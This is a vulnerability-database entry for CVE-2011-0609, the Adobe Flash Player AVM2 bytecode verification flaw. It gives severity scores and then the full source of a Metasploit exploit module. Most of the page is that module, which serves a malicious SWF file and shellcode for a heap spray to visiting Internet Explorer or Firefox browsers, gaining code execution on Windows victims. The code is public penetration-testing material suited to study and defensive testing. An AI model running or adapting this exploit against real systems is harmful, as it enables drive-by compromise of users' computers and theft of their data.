Lucene search

Bannedit <[email protected]>, UnknownMSF:EXPLOIT-WINDOWS-BROWSER-ADOBE_FLASHPLAYER_AVM-

HistoryMar 23, 2011 - 4:31 a.m.

Adobe Flash Player AVM Bytecode Verification Vulnerability

2011-03-2304:31:48

bannedit <[email protected]>, Unknown

www.rapid7.com

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.972 High

EPSS

Percentile

99.8%

JSON

This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for the RSA attack in March 2011. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
        and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
        logic. This results in unsafe JIT(Just-In-Time) code being executed.  This is the same
        vulnerability that was used for the RSA attack in March 2011.

          Specifically, this issue results in uninitialized memory being referenced and later
        executed. Taking advantage of this issue relies on heap spraying and controlling the
        uninitialized memory.

          Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
        other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
        of the uninitialized memory its fairly difficult to get around this restriction.
        },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bannedit', # Metasploit version,
          'Unknown'   # Malcode version seen used in targeted attacks
        ],
      'References'     =>
        [
          ['CVE', '2011-0609'],
          ['OSVDB', '71254'],
          ['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
          ['URL', 'http://www.adobe.com/devnet/swf.html'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
          ['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'          => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked'     => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {}],
        ],
      'DisclosureDate' => '2011-03-15',
      'DefaultTarget'  => 0))
  end

  def exploit
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf" )
    fd = File.open( path, "rb" )
    @swf = fd.read(fd.stat.size)
    fd.close

    super
  end

  def on_request_uri(cli, request)
    trigger = @swf
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
    shellcode = payload.encoded.unpack('H*')[0]
    obj_id = rand_text_alpha(rand(6)+3)

    if request.uri.match(/\.swf/i)
      print_status("Sending Exploit SWF")
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # we use a nice trick by having Flash request our shellcode and load it for the heap spray
    # src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
    if request.uri.match(/\.txt/i)
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    html =  <<-EOS
    <html>
      <head>
      </head>
      <body>
    <center>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
                 id="#{obj_id}" width="600" height="400"
                 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
             <param name="movie" value="#{get_resource}#{trigger_file}" />
             <embed src="#{get_resource}#{trigger_file}" quality="high"
                 width="320" height="300" name="#{obj_id}" align="middle"
                 allowNetworking="all"
                 type="application/x-shockwave-flash"
                 pluginspage="http://www.macromedia.com/go/getflashplayer">
             </embed>

         </object>
    </center>

    </body>
    </html>
EOS

    print_status("Sending #{self.name} HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end